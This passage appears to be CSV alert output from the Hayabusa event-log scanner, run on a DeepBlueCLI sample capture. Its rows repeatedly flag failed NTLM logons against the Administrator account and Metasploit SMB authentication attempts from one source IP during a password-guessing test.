NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GQKTlzx2gq9ayAtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tCzVponBvb9mbyIr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mSwnrFv90KjN2cqj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QX5TLs2MPkia1cmk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ammLKlG1Q5awQGvN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJ1ijJjPJbF4uFlo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: mZOLnwIzpGz03Yjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xS8U3UQNz6l0LZn0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: no6cftQ5MF1fjZ0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5WHS6jVRnCUH0Rb5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i3oGLwrCJXJOauf6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1sxPrDYV3rr4pGJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Osysh2O2A3A2bN22 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FsInW9EMJZU8FOrF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ge8do8TM4GG1atMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4w5GLbpVsAhGqCiq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 8eQXeW1VpRU0ptMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhLosoA2parzTnW9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MCFTP4gVGEKFKuRI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ALrDwJz2cta9fcXB : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZZNXGw28osMQLjub : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4wQzvMnwYuEQRO7V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UloOAIgGuj6NecfR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cVSeLo2PRgGmf83Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SaCFO8CPFLuERugV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCwV1D4L5BDZSriK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: QPhLQsM4R2ua4SxW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fwgp52JNi7xnTxpN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2GutBDenjweAluz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wflcgg5ebqu8hHGL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jXaaYSU2pakw6IsK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfJnBv3eA8wZttML : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kOXSI0jPfbvW4dAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8JW6aX5mNz7cETsl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NVuJLXJzlVnDLT4Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtSwhwnApnPI9AkO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 1peOkjbd1WXGEAAM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Tbw3V9MtLIcxr65R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CEZ2v1f6t0luDj4D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R0omMppAFlFhE1mG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0jMvVN9eSeGW3zcN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnFNYabbO7IpbVku : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8KtyTTNdqVikZGYY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DCChjnFv2hMXXwgW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FvIYRZSomaJYJOH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FEirUFRscaOwTuAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
